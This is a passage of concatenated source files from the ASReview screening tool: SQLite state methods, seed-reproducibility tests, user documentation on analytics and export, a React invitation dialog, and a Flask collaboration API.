self._is_valid_state()\n\n labeling_times = [datetime.now()] * len(record_ids)\n\n if notes is None:\n notes = [None for _ in record_ids]\n\n lengths = [len(record_ids), len(labels), len(notes)]\n # Check that all input data has the same length.\n if len(set(lengths)) != 1:\n raise ValueError(\"Input data should be of the same length.\")\n n_records_labeled = len(record_ids)\n\n pool, _, pending = self.get_pool_labeled_pending()\n\n if prior:\n # Check that the record_ids are in the pool.\n if not all(record_id in pool.values for record_id in record_ids):\n raise ValueError(\n \"Labeling priors, but not all \" \"record_ids were found in the pool.\"\n )\n\n query_strategies = [\"prior\" for _ in record_ids]\n training_sets = [-1 for _ in record_ids]\n data = [\n (\n int(record_ids[i]),\n int(labels[i]),\n query_strategies[i],\n training_sets[i],\n labeling_times[i],\n notes[i],\n )\n for i in range(n_records_labeled)\n ]\n\n # If prior, we need to insert new records into the database.\n query = (\n \"INSERT INTO results (record_id, label, query_strategy, \"\n \"training_set, labeling_time, notes) \"\n \"VALUES (?, ?, ?, ?, ?, ?)\"\n )\n\n else:\n # Check that the record_ids are pending.\n if not all(record_id in pending.values for record_id in record_ids):\n raise ValueError(\n \"Labeling records, but not all \" \"record_ids were pending.\"\n )\n\n data = [\n (int(labels[i]), labeling_times[i], notes[i], int(record_ids[i]))\n for i in range(n_records_labeled)\n ]\n\n # If not prior, we need to update records.\n query = (\n \"UPDATE results SET label=?, labeling_time=?, \"\n \"notes=? WHERE record_id=?\"\n )\n\n # Add the rows to the database.\n con = self._connect_to_sql()\n cur = con.cursor()\n cur.executemany(query, data)\n con.commit()\n con.close()\n\n def _add_labeling_data_simulation_mode(self, rows):\n \"\"\"Add labeling and model data to the results table.\n\n Add the labeling data and the model data at the same time to the\n results table. This is used for the simulation mode, since the model\n data is available at the time of labeling.\n\n Arguments\n ----------\n rows : list of tuples\n List of tuples (record_id: int, label: int, classifier: str,\n query_strategy: str, balance_strategy: str, feature_extraction: str,\n training_set: int, labeling_time: int, notes: str).\n \"\"\"\n query = (\n \"INSERT INTO results (record_id, label, classifier, \"\n \"query_strategy, balance_strategy, feature_extraction, \"\n \"training_set, labeling_time, notes) \"\n \"VALUES (?, ?, ?, ?, ?, ?, ?, ?, ?)\"\n )\n\n con = self._connect_to_sql()\n cur = con.cursor()\n cur.executemany(query, rows)\n con.commit()\n con.close()\n\n def update_decision(self, record_id, label, note=None):\n \"\"\"Change the label of an already labeled record.\n\n Arguments\n ---------\n record_id: int\n Id of the record whose label should be changed.\n label: 0 / 1\n New label of the record.\n note: str\n Note to add to the record.\n \"\"\"\n\n con = self._connect_to_sql()\n cur = con.cursor()\n\n # Change the label.\n cur.execute(\n \"UPDATE results SET label = ?, notes = ? \" \"WHERE record_id = ?\",\n (label, note, record_id),\n )\n\n # Add the change to the decision changes table.\n cur.execute(\n (\n \"INSERT INTO decision_changes (record_id, new_label, time) \"\n \"VALUES (?, ?, ?)\"\n ),\n (record_id, label, datetime.now()),\n )\n\n con.commit()\n con.close()\n\n def delete_record_labeling_data(self, record_id):\n \"\"\"Delete the labeling data for the given record id.\n\n Arguments\n ----------\n record_id : str\n Identifier of the record to delete.\n\n \"\"\"\n current_time = datetime.now()\n\n con = self._connect_to_sql()\n cur = con.cursor()\n cur.execute(\"DELETE FROM results WHERE record_id=?\", (record_id,))\n\n # Add the change to the decision changes table.\n cur.execute(\n (\n \"INSERT INTO decision_changes (record_id, new_label, time) \"\n \"VALUES (?,?, ?)\"\n ),\n (record_id, None, current_time),\n )\n con.commit()\n con.close()\n\n def get_decision_changes(self):\n \"\"\"Get the record ids for any decision changes.\n\n Get the record ids of the records whose labels have been changed\n after the original labeling action.\n\n Returns\n -------\n pd.DataFrame\n Dataframe with columns 'record_id', 'new_label', and 'time' for\n each record of which the labeling decision was changed.\n \"\"\"\n con = self._connect_to_sql()\n change_table = pd.read_sql_query(\"SELECT * FROM decision_changes\", con)\n con.close()\n return change_table\n\n def get_record_table(self):\n \"\"\"Get the record table of the state.\n\n Returns\n -------\n pd.Series:\n Series with name 'record_id' containing the record ids.\n \"\"\"\n con = self._connect_to_sql()\n record_table = pd.read_sql_query(\"SELECT * FROM record_table\", con)\n record_table = record_table[\"record_id\"]\n con.close()\n return record_table\n\n def get_last_probabilities(self):\n \"\"\"Get the probabilities produced by the last classifier.\n\n Returns\n -------\n pd.Series:\n Series with name 'proba' containing the probabilities.\n \"\"\"\n con = self._connect_to_sql()\n last_probabilities = pd.read_sql_query(\"SELECT * FROM last_probabilities\", con)\n con.close()\n return last_probabilities[\"proba\"]\n\n def get_last_ranking(self):\n \"\"\"Get the ranking from the state.\n\n Returns\n -------\n pd.DataFrame\n Dataframe with columns 'record_id', 'ranking', 'classifier',\n 'query_strategy', 'balance_strategy', 'feature_extraction',\n 'training_set' and 'time'. It has one row for each record in the\n dataset, and is ordered by ranking.\n \"\"\"\n con = self._connect_to_sql()\n last_ranking = pd.read_sql_query(\"SELECT * FROM last_ranking\", con)\n con.close()\n return last_ranking\n\n def _move_ranking_data_to_results(self, record_ids):\n \"\"\"Move data from the ranking to the results table.\n\n Move the data with the given record_ids from the last_ranking table\n to the results table.\n\n Arguments\n ---------\n record_ids: list\n List of record ids in last ranking whose model data should be added\n to the results table.\n \"\"\"\n if self.model_has_trained:\n record_list = [(record_id,) for record_id in record_ids]\n con = self._connect_to_sql()\n cur = con.cursor()\n cur.executemany(\n \"\"\"INSERT INTO results (record_id, classifier, query_strategy,\n balance_strategy, feature_extraction, training_set)\n SELECT record_id, classifier, query_strategy,\n balance_strategy, feature_extraction, training_set\n FROM last_ranking\n WHERE record_id=?\"\"\",\n record_list,\n )\n con.commit()\n con.close()\n else:\n raise StateError(\"Save trained model data \" \"before using this function.\")\n\n def query_top_ranked(self, n):\n \"\"\"Get the top ranked records from the ranking table.\n\n Get the top n instances from the pool according to the last ranking.\n Add the model data to the results table.\n\n Arguments\n ---------\n n: int\n Number of instances.\n\n Returns\n -------\n list\n List of record_ids of the top n ranked records.\n \"\"\"\n if self.model_has_trained:\n pool = self.get_pool()\n top_n_records = pool[:n].to_list()\n self._move_ranking_data_to_results(top_n_records)\n else:\n raise StateError(\"Save trained model data \" \"before using this function.\")\n\n return top_n_records\n\n # GET FUNCTIONS\n def get_data_by_query_number(self, query, columns=None):\n \"\"\"Get the data of a specific query from the results table.\n\n Arguments\n ---------\n query: int\n Number of the query of which you want the data. query=0 corresponds\n to all the prior records.\n columns: list\n List of columns names of the results table.\n\n Returns\n -------\n pd.DataFrame\n Dataframe containing the data from the results table with the given\n query number and columns.\n \"\"\"\n if columns is not None:\n if not isinstance(columns, list):\n raise ValueError(\"The columns argument should be a list.\")\n col_query_string = \"*\" if columns is None else \",\".join(columns)\n\n if query == 0:\n sql_query = (\n f\"SELECT {col_query_string} FROM results WHERE \"\n f\"query_strategy='prior'\"\n )\n else:\n rowid = query + self.n_priors\n sql_query = (\n f\"SELECT {col_query_string} FROM results WHERE \" f\"rowid={rowid}\"\n )\n\n con = self._connect_to_sql()\n data = pd.read_sql_query(sql_query, con)\n con.close()\n return data\n\n def get_data_by_record_id(self, record_id, columns=None):\n \"\"\"Get the data of a specific query from the results table.\n\n Arguments\n ---------\n record_id: int\n Record id of which you want the data.\n columns: list\n List of columns names of the results table.\n\n Returns\n -------\n pd.DataFrame\n Dataframe containing the data from the results table with the given\n record_id and columns.\n \"\"\"\n query_string = \"*\" if columns is None else \",\".join(columns)\n\n con = self._connect_to_sql()\n data = pd.read_sql_query(\n f\"SELECT {query_string} FROM results WHERE record_id={record_id}\", con\n )\n con.close()\n return data\n\n def get_dataset(self, columns=None, priors=True, pending=False):\n \"\"\"Get a subset from the results table.\n\n Can be used to get any column subset from the results table.\n Most other get functions use this one, except some that use a direct\n SQL query for efficiency.\n\n Arguments\n ---------\n columns: list, str\n List of columns names of the results table, or a string containing\n one column name.\n priors: bool\n Whether to keep the records containing the prior knowledge.\n pending: bool\n Whether to keep the records which are pending a labeling decision.\n\n Returns\n -------\n pd.DataFrame:\n Dataframe containing the data of the specified columns of the\n results table.\n \"\"\"\n if isinstance(columns, str):\n columns = [columns]\n\n if (not priors) or (not pending):\n sql_where = []\n if not priors:\n sql_where.append(\"query_strategy is not 'prior'\")\n if not pending:\n sql_where.append(\"label is not NULL\")\n\n sql_where_str = f\"WHERE {sql_where[0]}\"\n if len(sql_where) == 2:\n sql_where_str += f\" AND {sql_where[1]}\"\n else:\n sql_where_str = \"\"\n\n # Query the database.\n query_string = \"*\" if columns is None else \",\".join(columns)\n con = self._connect_to_sql()\n data = pd.read_sql_query(\n f\"SELECT {query_string} FROM results {sql_where_str}\", con\n )\n con.close()\n\n return data\n\n def get_order_of_labeling(self, priors=True, pending=False):\n \"\"\"Get full array of record id's in order that they were labeled.\n\n Arguments\n ---------\n priors: bool\n Whether to keep the records containing the prior knowledge.\n pending: bool\n Whether to keep the records are pending a labeling decision.\n\n Returns\n -------\n pd.Series:\n The record_id's in the order that they were labeled.\n \"\"\"\n return self.get_dataset(\"record_id\", priors=priors, pending=pending)[\n \"record_id\"\n ]\n\n def get_priors(self, columns=[\"record_id\"]):\n \"\"\"Get the record ids of the priors.\n\n Returns\n -------\n pd.Series:\n The record_id's of the priors in the order they were added.\n \"\"\"\n\n query_string = \"*\" if columns is None else \",\".join(columns)\n\n con = self._connect_to_sql()\n data = pd.read_sql_query(\n f\"SELECT {query_string} FROM results\" \" WHERE query_strategy is 'prior'\",\n con,\n )\n con.close()\n\n return data\n\n def get_labels(self, priors=True, pending=False):\n \"\"\"Get the labels from the state.\n\n Arguments\n ---------\n priors: bool\n Whether to keep the records containing the prior knowledge.\n pending: bool\n Whether to keep the records which are pending a labeling decision.\n\n Returns\n -------\n pd.Series:\n Series containing the labels at each labelling moment.\n \"\"\"\n\n return self.get_dataset(\"label\", priors=priors, pending=pending)[\"label\"]\n\n def get_classifiers(self, priors=True, pending=False):\n \"\"\"Get the classifiers from the state.\n\n Arguments\n ---------\n priors: bool\n Whether to keep the records containing the prior knowledge.\n pending: bool\n Whether to keep the records which are pending a labeling decision.\n\n Returns\n -------\n pd.Series:\n Series containing the classifier used at each labeling moment.\n \"\"\"\n return self.get_dataset(\"classifier\", priors=priors, pending=pending)[\n \"classifier\"\n ]\n\n def get_query_strategies(self, priors=True, pending=False):\n \"\"\"Get the query strategies from the state.\n\n Arguments\n ---------\n priors: bool\n Whether to keep the records containing the prior knowledge.\n pending: bool\n Whether to keep the records which are pending a labeling decision.\n\n Returns\n -------\n pd.Series:\n Series containing the query strategy used to get the record to\n query at each labeling moment.\n \"\"\"\n return self.get_dataset(\"query_strategy\", priors=priors, pending=pending)[\n \"query_strategy\"\n ]\n\n def get_balance_strategies(self, priors=True, pending=False):\n \"\"\"Get the balance strategies from the state.\n\n Arguments\n ---------\n priors: bool\n Whether to keep the records containing the prior knowledge.\n pending: bool\n Whether to keep the records which are pending a labeling decision.\n\n Returns\n -------\n pd.Series:\n Series containing the balance strategy used to get the training\n data at each labeling moment.\n \"\"\"\n return self.get_dataset(\"balance_strategy\", priors=priors, pending=pending)[\n \"balance_strategy\"\n ]\n\n def get_feature_extraction(self, priors=True, pending=False):\n \"\"\"Get the query strategies from the state.\n\n Arguments\n ---------\n priors: bool\n Whether to keep the records containing the prior knowledge.\n pending: bool\n Whether to keep the records which are pending a labeling decision.\n\n Returns\n -------\n pd.Series:\n Series containing the feature extraction method used for the\n classifier input at each labeling moment.\n \"\"\"\n return self.get_dataset(\"feature_extraction\", priors=priors, pending=pending)[\n \"feature_extraction\"\n ]\n\n def get_training_sets(self, priors=True, pending=False):\n \"\"\"Get the training_sets from the state.\n\n Arguments\n ---------\n priors: bool\n Whether to keep the records containing the prior knowledge.\n pending: bool\n Whether to keep the records which are pending a labeling decision.\n\n Returns\n -------\n pd.Series:\n Series containing the training set on which the classifier was fit\n at each labeling moment.\n \"\"\"\n return self.get_dataset(\"training_set\", priors=priors, pending=pending)[\n \"training_set\"\n ]\n\n def get_labeling_times(self, time_format=\"int\", priors=True, pending=False):\n \"\"\"Get the time of labeling from the state.\n\n Arguments\n ---------\n time_format: 'int' or 'datetime'\n Format of the return value. If it is 'int' you get a UTC timestamp,\n if it is 'datetime' you get datetime instead of an integer.\n priors: bool\n Whether to keep the records containing the prior knowledge.\n pending: bool\n Whether to keep the records which are pending a labeling decision.\n\n Returns\n -------\n pd.Series:\n If format='int' you get a UTC timestamp (integer number of\n microseconds), if it is 'datetime' you get datetime format.\n \"\"\"\n times = self.get_dataset(\"labeling_time\", priors=priors, pending=pending)[\n \"labeling_time\"\n ]\n\n # Convert time to datetime format.\n if time_format == \"datetime\":\n times = times.applymap(lambda x: datetime.utcfromtimestamp(x / 10**6))\n\n return times\n\n # Get pool, labeled and pending in slightly more optimized way than via\n # get_dataset.\n def get_pool(self):\n \"\"\"Get the unlabeled, not-pending records in ranking order.\n\n Get the pool of unlabeled records, not pending a labeling decision,\n in the ranking order. If you only want the records in the pool, this\n is more efficient than via 'get_pool_labeled_pending'.\n\n Returns\n -------\n pd.Series\n Series containing the record_ids of the unlabeled, not pending\n records, in the order of the last available ranking.\n \"\"\"\n # If model has trained, using ranking to order pool.\n con = self._connect_to_sql()\n if self.model_has_trained:\n query = \"\"\"SELECT last_ranking.record_id, last_ranking.ranking,\n results.query_strategy\n FROM last_ranking\n LEFT JOIN results\n ON last_ranking.record_id = results.record_id\n WHERE results.query_strategy is null\n ORDER BY ranking\n \"\"\"\n df = pd.read_sql_query(query, con)\n\n # Else return all records not yet in the results table.\n else:\n query = \"\"\"SELECT record_table.record_id, results.query_strategy\n FROM record_table\n LEFT JOIN results\n ON record_table.record_id = results.record_id\n WHERE results.query_strategy is null\n \"\"\"\n df = pd.read_sql_query(query, con)\n\n con.close()\n return df[\"record_id\"]\n\n def get_labeled(self):\n \"\"\"Get the labeled records in order of labeling.\n\n Get the record_ids and labels of the labeled records in order of\n labeling. If you only want the labeled records, this is more efficient\n than via 'get_pool_labeled_pending'.\n\n Returns\n -------\n pd.DataFrame\n Dataframe containing the record_ids and labels of the labeled\n records, in the order that they were labeled.\n \"\"\"\n con = self._connect_to_sql()\n query = \"\"\"SELECT record_id, label FROM results\n WHERE label is not null\"\"\"\n df = pd.read_sql_query(query, con)\n con.close()\n return df\n\n def get_pending(self):\n \"\"\"Get the record_ids of the records pending a labeling decision.\n\n If you only want the pending records, this is more efficient\n than via 'get_pool_labeled_pending'.\n\n Returns\n -------\n pd.Series\n A series containing the record_ids of the records whose label is\n pending.\n \"\"\"\n con = self._connect_to_sql()\n query = \"\"\"SELECT record_id FROM results WHERE label is null\"\"\"\n df = pd.read_sql_query(query, con)\n con.close()\n return df[\"record_id\"]\n\n def get_pool_labeled_pending(self):\n \"\"\"Return the unlabeled pool, labeled and pending records.\n\n Convenience function to get the pool, labeled and pending records in\n one SQL query. If you only want one of these, it is more efficient to\n use the methods 'get_pool', 'get_labeled' or 'get_pending'.\n\n Returns\n -------\n tuple (pd.Series, pd.DataFrame, pd.Series):\n Returns a tuple (pool, labeled, pending). Pool is a series\n containing the unlabeled, not pending record_ids, ordered by the\n last predicted ranking of the model. Labeled is a dataframe\n containing the record_ids and labels of the labeled records, in the\n order that they were labeled. Pending is a series containing the\n record_ids of the records whose label is pending.\n \"\"\"\n con = self._connect_to_sql()\n\n query = \"\"\"SELECT record_table.record_id, results.label,\n results.rowid AS label_order, results.query_strategy,\n last_ranking.ranking\n FROM record_table\n LEFT JOIN results\n ON results.record_id=record_table.record_id\n LEFT JOIN last_ranking\n ON record_table.record_id=last_ranking.record_id\n ORDER BY label_order, ranking\n \"\"\"\n\n df = pd.read_sql_query(query, con)\n con.close()\n labeled = df.loc[~df[\"label\"].isna()].loc[:, [\"record_id\", \"label\"]].astype(int)\n pool = df.loc[df[\"label_order\"].isna(), \"record_id\"].astype(int)\n pending = (\n df.loc[df[\"label\"].isna() & ~df[\"query_strategy\"].isna()]\n .loc[:, \"record_id\"]\n .astype(int)\n )\n\n return pool, labeled, pending\n" }, { "alpha_fraction": 0.5668614506721497, "alphanum_fraction": 0.5936747789382935, "avg_line_length": 25.20720672607422, "blob_id": "3ecf77ecb040c81233fb64e6619993fb28337857", "content_id": "0d672f9748cf71413c5a4a8faaf2c853391841ab", "detected_licenses": [ "Apache-2.0" ], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 2909, "license_type": "permissive", "max_line_length": 74, "num_lines": 111, "path": "/tests/test_init.py", "repo_name": "terrymyc/asreview", "src_encoding": "UTF-8", "text": "from pathlib import Path\n\nimport pytest\nfrom pandas.testing import assert_frame_equal\n\nfrom asreview.entry_points.simulate import SimulateEntryPoint\nfrom asreview.project import open_state\n\nDATA_FP = Path(\"tests\", \"demo_data\", \"generic_labels.csv\")\n\n\[email protected](\n \"seed\",\n [\n (535),\n (165),\n (42),\n ],\n)\ndef test_init_seed(tmpdir, seed):\n project1_fp = Path(tmpdir, \"tmp_state1.asreview\")\n project2_fp = Path(tmpdir, \"tmp_state2.asreview\")\n\n entry_point = SimulateEntryPoint()\n\n # simulate run 1\n argv1 = (\n f\"{DATA_FP} -s {project1_fp} -m nb --init_seed\"\n f\" {seed} --n_prior_excluded 1 --n_prior_included 1 -n 2\".split()\n )\n\n # simulate run 2\n argv2 = (\n f\"{DATA_FP} -s {project2_fp} -m nb --init_seed\"\n f\" {seed} --n_prior_excluded 1 --n_prior_included 1 -n 2\".split()\n )\n\n # run the simulations\n entry_point.execute(argv1)\n entry_point.execute(argv2)\n\n # open the state file and extract the priors\n with open_state(project1_fp) as s1:\n record_ids1 = s1.get_priors()[\"record_id\"]\n\n with open_state(project2_fp) as s2:\n record_ids2 = s2.get_priors()[\"record_id\"]\n\n assert record_ids1.tolist() == record_ids2.tolist()\n\n\ndef test_no_seed(tmpdir):\n priors = []\n for i in range(20):\n # get project url\n project_fp = Path(tmpdir, f\"tmp_state_{i}.asreview\")\n\n entry_point = SimulateEntryPoint()\n argv = (\n f\"{DATA_FP} -s {project_fp} -m nb \"\n f\"--n_prior_excluded 1 --n_prior_included 1 -n 2\".split()\n )\n entry_point.execute(argv)\n\n # open the state file and extract the priors\n with open_state(project_fp) as s:\n priors.extend(s.get_priors()[\"record_id\"].tolist())\n\n assert len(set(priors)) > 2\n\n\[email protected](\n \"seed\",\n [\n (535),\n (165),\n (42),\n ],\n)\ndef test_model_seed(tmpdir, seed):\n project1_fp = Path(tmpdir, \"tmp_state1.asreview\")\n project2_fp = Path(tmpdir, \"tmp_state2.asreview\")\n\n entry_point = SimulateEntryPoint()\n\n # simulate run 1\n argv1 = (\n f\"{DATA_FP} -s {project1_fp} -m rf --init_seed {seed}\"\n f\" --seed {seed}\"\n f\" --n_prior_excluded 1 --n_prior_included 1\".split()\n )\n\n # simulate run 2\n argv2 = (\n f\"{DATA_FP} -s {project2_fp} -m rf --init_seed {seed}\"\n f\" --seed {seed}\"\n f\" --n_prior_excluded 1 --n_prior_included 1\".split()\n )\n\n # run the simulations\n entry_point.execute(argv1)\n entry_point.execute(argv2)\n\n # open the state file and extract the priors\n with open_state(project1_fp) as s1:\n record_table1 = s1.get_dataset().drop(\"labeling_time\", axis=1)\n\n with open_state(project2_fp) as s2:\n record_table2 = s2.get_dataset().drop(\"labeling_time\", axis=1)\n\n assert_frame_equal(record_table1, record_table2)\n" }, { "alpha_fraction": 0.7393479347229004, "alphanum_fraction": 0.7510188817977905, "avg_line_length": 34.959999084472656, "blob_id": "a2e17a89a4f7dacff287e90ff3bdb8f57be33933", "content_id": "da19c699618d732f164ad005aac0f58708af383c", "detected_licenses": [ "Apache-2.0" ], "is_generated": false, "is_vendor": false, "language": "reStructuredText", "length_bytes": 5398, "license_type": "permissive", "max_line_length": 187, "num_lines": 150, "path": "/docs/source/progress.rst", "repo_name": "terrymyc/asreview", "src_encoding": "UTF-8", "text": "Progress and results\n====================\n\nDuring screening, you might want to keep track of your progress and to obtain\ninformation for your stopping criteria. This section provides documentation on\nuseful tools for these purposes.\n\nAnalytics\n---------\n\nASReview LAB offers some insightful statistics, a progress chart, and recall\nchart to keep track of your screening process and help you to decide when to\nstop screening.\n\nTo open\nthe statistics panel:\n\n1. :doc:`start`.\n2. Open or :doc:`project_create`.\n3. Click on Analytics on in the left menu.\n\n\n.. figure:: ../images/project_analytics.png\n :alt: ASReview LAB progress analytics for fully labeled\n\n This figure shows the Analytics page of a fully labeled dataset. All\n relevant records are found in the first part of the screening.\n\n\nSummary statistics\n~~~~~~~~~~~~~~~~~~\n\nThe summary statistics are counts of the records in your dataset.\n\n- Total records: the total number of records in your dataset.\n- Labeled records: the number of records that you labeled as relevant or irrelevant, including those you added as prior knowledge.\n- Relevant records: the number of records that you labeled as relevant, including those you added as prior knowledge.\n- Irrelevant records: the number of records that you labeled as irrelevant, including those you added as prior knowledge.\n- Irrelevant since last relevant: the number of irrelevant records you have seen since the last relevant record. \n\n\nCharts\n~~~~~~\n\nThe charts on the analytics page can be useful to monitor your progress. There\nis a *Progress* and a *Recall* chart. The charts do not include prior\nknowledge and are most relevant after you have screened at least 10 records.\n\n\n**Progress chart**\n\nThe progress chart plots the number of relevant records in the last 10 records\nthat you reviewed in ASReview LAB. For example, when you reviewed 100 records,\nyou labeled 3 relevant records between the 91st and 100th reviewed records.\n\n**Recall chart**\n\nThe recall chart plots the number of relevant records against the number of\nrecords that you reviewed in ASReview LAB. *Relevant by ASReview LAB* refers to\nthe relevant records that you labeled with the assistance of the active\nlearning model. *Random relevant* refers to the relevant records that you might\nfind if you manually reviewed the records so far without the assistance of the\nactive learning model.\n\n**Export Figure**\n\nThe plots can be exported as a figure:\n\n1. :doc:`start`.\n2. Open or :doc:`project_create`.\n3. Click on Analytics on in the left menu.\n4. Click on the hamburger menu next to the Progress or Recall chart. \n5. Select *Download SVG* or *PNG* to export a figure, or select *Download CSV* to export the data behind the figure. \n\n\nStop screening\n--------------\n\nThe `blogpost\n*ASReview Class 101* <https://asreview.ai/blog/asreview-class-101/>`_ and the\n`How to stop screening?\n<https://github.com/asreview/asreview/discussions/557>`_ discussion provide\ntips on when to stop with screening.\n\n.. tip::\n\n The number of *irrelevant records since last relevant* will increase the longer you screen.\n\n.. tip:: \n\n With *Maximum* as :ref:`project_create:Query Strategy`, you will \n see a decline in the number of relevant items in the plots the longer you screen. This may\n help to decide when to 'stop screening <https://github.com/asreview/asreview/discussions/557>`_. \n\n.. tip::\n\n The data behind the recall plot can be used to calculate the `knee-algorithm <https://github.com/asreview/asreview/discussions/1115#discussioncomment-2812003>`_ as a stopping criteria. \n\n\nMark project as finished\n------------------------\n\nWhen you decide to stop screening, you can mark the project as finished. You\ncan undo this at any time. To mark your project as finished:\n\n1. :doc:`start`.\n2. Go to the *Projects dashboard* (http://localhost:5000/projects)\n3. Hover the project you want to mark as finished and click on *Options*.\n4. Click on *Mark as finished*.\n\nThe button to continue screening is now disabled. This can be undone by\nclicking again on *Mark as in review*.\n\n\nExport results\n--------------\n\nYou can export the results of your labeling to a RIS, CSV, TSV, or Excel file.\nA file contains all imported data including your decisions. \n\nThe following variables will be added to your dataset:\n\n- The column titled **included** contains the labels as provided by the user:\n ``0`` = not relevant, ``1`` = relevant and if missing it means the record is\n not seen during the screening process.\n- The column titled **asreview_ranking** contains an identifier to\n preserve the rank ordering as described below.\n\nThe file is ordered as follows:\n\n1. All relevant records you have seen in the order they were shown during the screening process.\n2. All records not seen during the screening and ordered from most to least relevant according to the last iteration of the model.\n3. All non-relevant records are presented in the order these are shown during the screening process.\n\n\nTo download your results follow these steps:\n\n1. :doc:`start`.\n2. Open or :doc:`project_create`.\n3. Click on *Export* in the menu on the left.\n4. Select *Dataset*.\n5. Select the file type for prefer: i.e. Excel, RIS, TSV, or CSV file.\n6. Save the file to your device.\n\n.. figure:: ../images/project_export_dataset.png\n :alt: ASReview LAB dataset download\n\n.. note::\n\n A RIS file can only be exported if a RIS file is imported.\n\n\n\n\n" }, { "alpha_fraction": 0.5872129201889038, "alphanum_fraction": 0.6021105051040649, "avg_line_length": 22.014286041259766, "blob_id": "c71344c437e17e5693d8c19414569c846a6b5ce7", "content_id": "9eddcba2b6686a00bc4185881dd76239f7bfd2ef", "detected_licenses": [ "Apache-2.0" ], "is_generated": false, "is_vendor": false, "language": "JavaScript", "length_bytes": 1611, "license_type": "permissive", "max_line_length": 75, "num_lines": 70, "path": "/asreview/webapp/src/ProjectComponents/TeamComponents/AcceptanceDialog.js", "repo_name": "terrymyc/asreview", "src_encoding": "UTF-8", "text": "import * as React from \"react\";\nimport { Dialog, Divider } from \"@mui/material\";\nimport { styled } from \"@mui/material/styles\";\nimport AcceptanceContents from \"./AcceptanceContents\";\nimport DialogHeader from \"./DialogHeader\";\n\nconst PREFIX = \"SetupDialog\";\n\nconst classes = {\n content: `${PREFIX}-content`,\n stepper: `${PREFIX}-stepper`,\n form: `${PREFIX}-form`,\n formWarmup: `${PREFIX}-form-warmup`,\n};\n\nconst StyledDialog = styled(Dialog)(({ theme }) => ({\n [`& .${classes.content}`]: {\n paddingLeft: 0,\n paddingRight: 0,\n overflowY: \"hidden\",\n },\n\n [`& .${classes.stepper}`]: {\n padding: 8,\n },\n\n [`& .${classes.form}`]: {\n height: \"calc(100% - 60px)\",\n overflowY: \"scroll\",\n padding: \"32px 48px 48px 48px\",\n },\n\n [`& .${classes.formWarmup}`]: {\n alignItems: \"center\",\n display: \"flex\",\n justifyContent: \"center\",\n },\n}));\n\nconst AcceptanceDialog = (props) => {\n const handleClose = () => {\n props.onClose();\n };\n\n return (\n <StyledDialog\n aria-label=\"acceptance dialog\"\n open={props.open}\n fullScreen={props.mobileScreen}\n fullWidth\n maxWidth=\"md\"\n PaperProps={{\n sx: { height: !props.mobileScreen ? \"calc(100% - 96px)\" : \"100%\" },\n }}\n >\n <DialogHeader\n title=\"Collaboration invitations\"\n handleClose={handleClose}\n />\n <Divider />\n <AcceptanceContents\n projectInvitations={props.projectInvitations}\n handleAcceptance={props.handleAcceptance}\n handleRejection={props.handleRejection}\n />\n </StyledDialog>\n );\n};\n\nexport default AcceptanceDialog;\n" }, { "alpha_fraction": 0.601341187953949, "alphanum_fraction": 0.6087313294410706, "avg_line_length": 33.630332946777344, "blob_id": "71c746bb4f6532cbdf261724422ec888d8c1bf24", "content_id": "e52542670f0cb416195e5378e0a7f216ed2c8208", "detected_licenses": [ "Apache-2.0" ], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 7307, "license_type": "permissive", "max_line_length": 85, "num_lines": 211, "path": "/asreview/webapp/api/team.py", "repo_name": "terrymyc/asreview", "src_encoding": "UTF-8", "text": "from flask import Blueprint\nfrom flask import jsonify\nfrom flask_login import current_user\nfrom sqlalchemy import and_\nfrom sqlalchemy.exc import SQLAlchemyError\n\nfrom asreview.project import ASReviewProject\nfrom asreview.webapp import DB\nfrom asreview.webapp.authentication.login_required import asreview_login_required\nfrom asreview.webapp.authentication.models import Project\nfrom asreview.webapp.authentication.models import User\n\nbp = Blueprint(\"team\", __name__, url_prefix=\"/api\")\n\nREQUESTER_FRAUD = {\"message\": \"Request can not made by current user.\"}\n\n\[email protected](\"/projects/<project_id>/users\", methods=[\"GET\"])\n@asreview_login_required\ndef users(project_id):\n \"\"\"Returns all users involved in a project.\"\"\"\n response = jsonify(REQUESTER_FRAUD), 404\n\n # get project\n project = Project.query.filter(Project.project_id == project_id).one_or_none()\n\n # check if this project is in fact from current user\n if project in current_user.projects:\n # get associated users from project\n collaborators = project.collaborators\n invitations = project.pending_invitations\n\n # get all users that are involved (invited or collabo)\n collaborators = [user.id for user in collaborators]\n invitations = [user.id for user in invitations]\n\n # get all users minus myself\n all_users = [\n u.summarize()\n for u in User.query.filter(and_(User.public, User.id != current_user.id))\n .order_by(\"name\")\n .all()\n ]\n\n # response\n response = (\n jsonify(\n {\n \"all_users\": all_users,\n \"collaborators\": collaborators,\n \"invitations\": invitations,\n }\n ),\n 200,\n )\n return response\n\n\[email protected](\"/projects/<project_id>/users/<user_id>\", methods=[\"DELETE\"])\n@asreview_login_required\ndef end_collaboration(project_id, user_id):\n \"\"\"Project owner removes a collaborator, or collaborator\n removes him/herself.\"\"\"\n response = jsonify(REQUESTER_FRAUD), 404\n # get project\n project = Project.query.filter(Project.project_id == project_id).one_or_none()\n\n # check if project is owned by current user or if the user is\n # involved in the project\n if project and (\n (project.owner == current_user) or (project in current_user.involved_in)\n ):\n user = DB.session.get(User, user_id)\n\n try:\n project.collaborators.remove(user)\n DB.session.commit()\n response = (\n jsonify({\"message\": \"Collaborator removed from project.\"}),\n 200\n )\n\n except SQLAlchemyError:\n response = (\n jsonify({\"message\": \"Error removing collaborator.\"}),\n 404\n )\n return response\n\n\[email protected](\"/invitations\", methods=[\"GET\"])\n@asreview_login_required\ndef pending_invitations():\n \"\"\"Returns pending invitations for current user.\"\"\"\n invitations = []\n for p in current_user.pending_invitations:\n # get path of project\n path = p.project_path\n # get object to get name\n asreview_object = ASReviewProject(path)\n # append info\n invitations.append(\n {\n \"id\": p.id,\n \"project_id\": p.project_id,\n \"owner_id\": p.owner_id,\n \"name\": asreview_object.config[\"name\"],\n \"created_at_unix\": asreview_object.config[\"created_at_unix\"],\n \"mode\": asreview_object.config[\"mode\"],\n }\n )\n response = (jsonify({\"invited_for_projects\": invitations}), 200)\n return response\n\n\[email protected](\"/invitations/projects/<project_id>/users/<user_id>\", methods=[\"POST\"])\n@asreview_login_required\ndef invite(project_id, user_id):\n \"\"\"Project owner invites a user to collaborate on a project\"\"\"\n response = jsonify(REQUESTER_FRAUD), 404\n # get project\n project = Project.query.filter(Project.project_id == project_id).one_or_none()\n # check if project is from current user\n if project and project.owner == current_user:\n user = DB.session.get(User, user_id)\n project.pending_invitations.append(user)\n try:\n DB.session.commit()\n response = (\n jsonify({\"message\": 